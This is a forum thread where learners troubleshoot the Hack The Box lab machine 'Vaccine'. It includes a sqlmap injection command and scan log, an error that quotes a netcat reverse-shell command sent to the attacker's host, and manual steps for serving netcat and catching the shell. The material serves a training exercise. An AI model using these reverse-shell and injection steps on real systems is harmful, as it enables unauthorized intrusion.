I’ve been stuck on this box for over a week. I’m doubly frustrated as I bought VIP access when I first started but can’t use it as this box is in my way.
I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.
Getting through this box is going to need some stubborn determination I think. If anything it’s a good thing that it’s not working because it’s going to force us to think for ourselves and self learn what we don’t know. There will be another way in I am sure.
I’m not using MSF, I’m trying to use it sparingly as I don’t believe MSF is a very good tool for learning. I’m trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.
Hello,
I have the same issue: time out when using the --os-shell option with sqlmap.
Doing it manually (with florianges’s python script) does not seem to solve the issue.
Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: “ERROR: program “/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash” failed DETAIL: command not found”
For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.
Thank you.
I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon as a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.
Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.
Hiya,
Yes VIP includes a separate server for starting-point VIP. However, there’s no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.
Maybe try tackling the machine at a different time of day.
I really struggled on this one with the same issues, gave up on sqlmap and used @florianges ’ Python script. Struggled to understand the nc parameter I was meant to set. Couldn’t get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.
Hi guys, need help with this machine… when I run sqlmap with the right cookie it is giving me a 302 redirect to index.php
Anyone know how to get past this?
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8"
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter ‘search’ does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter ‘search’ might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter ‘search’
[21:43:30] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:43:30] [INFO] testing ‘Boolean-based blind - Parameter replace (original value)’
[21:43:30] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[21:43:31] [INFO] testing ‘PostgreSQL AND error-based - WHERE or HAVING clause’
[21:43:31] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)’
[21:43:32] [INFO] testing ‘Oracle AND error-based - WHERE or HAVING clause (XMLType)’
[21:43:32] [INFO] testing ‘MySQL >= 5.0 error-based - Parameter replace (FLOOR)’
[21:43:32] [INFO] testing ‘Generic inline queries’
[21:43:32] [INFO] testing ‘PostgreSQL > 8.1 stacked queries (comment)’
[21:43:32] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries (comment)’
[21:43:33] [INFO] testing ‘Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)’
[21:43:33] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[21:43:34] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[21:43:34] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind (IF)’
[21:43:34] [INFO] testing ‘Oracle AND time-based blind’
It looks like a few people had questions about how to manually perform the SQL injection. Using Florianges’ methodology, I was able to get it working manually. Here is what I did:
Assumptions: you are logged into the website using admin creds.
Stand up a simple webserver on port 80
[sudo python3 -m http.server 80]
In the case of the server above, my server makes my desktop the root directory. So I made sure I had a copy of netcat on my desktop (I put it in a folder called bin for funsies)
Open up netcat on port 4444 (or whatever port)
[nc -lvnp 4444]
Check netcat - you should have a terminal. Do a test command like whoami if you’d like.
— fin —
Note 2: the number 27440 is a random number. I’d recommend changing it when you execute.
This challenge was a little trickier due to sqlmap not working but I enjoyed learning how to do a manual SQL injection. If anyone is able to help me understand why sqlmap isn’t working, I’d be interested to know.
Hi guys, need help with this machine… when I run sqlmap with the right cookie it is giving me a 302 redirect to index.php
Anyone know how to get past this?
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8"
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
You have an error in the command. It is PHPSESSID=3dr3h62vjq0tn58mu5o1oep0e8. You copied from the web browser with “:” and used PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8
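Why the colon form produces the 302 seen in the log, as an added example that is not part of any post in this thread: a simplified model of how a server splits the Cookie header and gates a page on the session. The session store and the `dashboard_response` gate are hypothetical; the session id is the one quoted above.

```python
# Constructed session store for illustration; the id is the one quoted in the thread.
SESSIONS = {"3dr3h62vjq0tn58mu5o1oep0e8": "admin"}


def parse_cookie_header(header):
    """Split a Cookie header value into {name: value} pairs (name=value; name=value)."""
    cookies = {}
    for pair in header.split(";"):
        pair = pair.strip()
        if not pair:
            continue
        name, sep, value = pair.partition("=")
        # Without "=", the whole token is taken as a cookie name with an empty value,
        # so "PHPSESSID:abc" never yields a cookie called PHPSESSID.
        cookies[name.strip()] = value.strip() if sep else ""
    return cookies


def dashboard_response(cookie_header):
    """Hypothetical auth gate: 200 for a known session, otherwise 302 to the login page."""
    session_id = parse_cookie_header(cookie_header).get("PHPSESSID")
    if session_id in SESSIONS:
        return 200, None
    return 302, "/index.php"


if __name__ == "__main__":
    for header in ("PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8",
                   "PHPSESSID=3dr3h62vjq0tn58mu5o1oep0e8"):
        print(header, "->", dashboard_response(header))
```

With the colon form every request is answered with the same redirect to the login page, which is why the scanner reported that the parameter "does not appear to be dynamic".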
I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?
Hi! I guess accessing the server was not an issue and SQL injection was not mandatory to gain OS access, I simply used the ftpuser password from the last lab’s FileZilla config and used it to log in to the server and gain access to the postgresql user. But now I’m stuck with the privilege escalation…!